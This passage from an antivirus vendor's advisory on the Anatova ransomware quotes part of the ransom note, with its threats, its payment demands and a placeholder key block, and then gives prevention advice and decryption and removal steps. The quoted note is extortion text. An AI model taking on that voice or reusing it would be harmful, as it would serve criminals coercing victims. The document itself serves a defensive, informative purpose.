Later wait for our reply with your decryptor. If you want to send us ONE JPG FILE ONLY max 200kb to decrypt per free before of payment

Don’t try fuck us, in this case you NEVER will recover your files. Nothing personal, only business.

Send this file untouched with your payment or/and free file!

—KEY—

<random key>

—KEY—

What you can do

SUPERAntiSpyware detects many variants of Anatova; however, new versions are being created all the time so make sure to always update to the latest database version. Also, upgrading to Real-Time protection will dramatically increase your level of protection from this threat.

Refraining from using Anatova’s primary infection vector — peer-to-peer file sharing services — should effectively keep your system safe from this infection. As stated before, if you do use P2P file sharing services, you must be extremely careful with what you download. Make sure to scan every file with SUPERAntiSpyware and VirusTotal to ensure it is safe before opening it.

How To Remove Anatova

  1. Using an uninfected system, search the internet for a decryptor for your particular version of Anatova and copy it to a USB drive — I would suggest starting your search with No More Ransom.
  2. Restart the infected computer in Safe Mode with Networking.
  3. Insert the USB drive with the decryptor, copy it to the desktop, then eject and remove the drive.
  4. Run the decryptor.
  5. Assuming the decryptor is successful, update your SUPERAntiSpyware to the latest database version and run a complete scan to remove any traces of Anatova from your system.
  6. If the decryptor does not work, you can take your computer to a data recovery expert.